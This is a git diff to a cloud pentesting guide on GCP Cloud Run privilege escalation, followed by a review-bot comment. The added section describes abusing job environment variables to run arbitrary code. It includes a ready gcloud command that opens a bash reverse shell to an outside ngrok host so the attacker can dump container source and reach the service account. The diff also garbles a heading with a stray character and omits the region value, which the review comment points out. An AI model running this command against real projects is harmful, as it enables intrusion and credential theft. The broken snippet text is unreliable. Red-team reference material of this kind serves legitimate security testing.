diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md index 3c147ce5c0..4910b0b6a5 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md @@ -78,7 +78,17 @@ gcloud beta run jobs update hacked \ --execute-now ``` -### `run.jobs.setIamPolicy` +### run.jobs.run, run.jobs.runWithOverrides, (run.jobs.get) + +Abuse the env variables of a job execution to execute arbitrary code and get a reverse shell to dump the contents of the container (source code) and access the SA inside the metadata: + +{% code overflow="wrap" %} +```bash +gcloud beta run jobs execute job-name --region --update-env-vars="PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/14195 0>&1' #%s" +``` +{% endcode %} + +### `çrun.jobs.setIamPolicy` Give yourself the previous permissions over Cloud Jobs.
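Review bot: the re-added heading `### \`çrun.jobs.setIamPolicy\`` carries a stray `ç` before `run`, which corrupts the permission name and changes the heading's anchor; it should read `### \`run.jobs.setIamPolicy\`` exactly as the removed line did. The new heading `### run.jobs.run, run.jobs.runWithOverrides, (run.jobs.get)` also drops the backticks that the sibling headings in this file use around permission names, so wrap each name in backticks for consistency, and in the added command `--region` is given no value, so a placeholder such as `--region <region>` should be supplied for the snippet to be copy-pasteable.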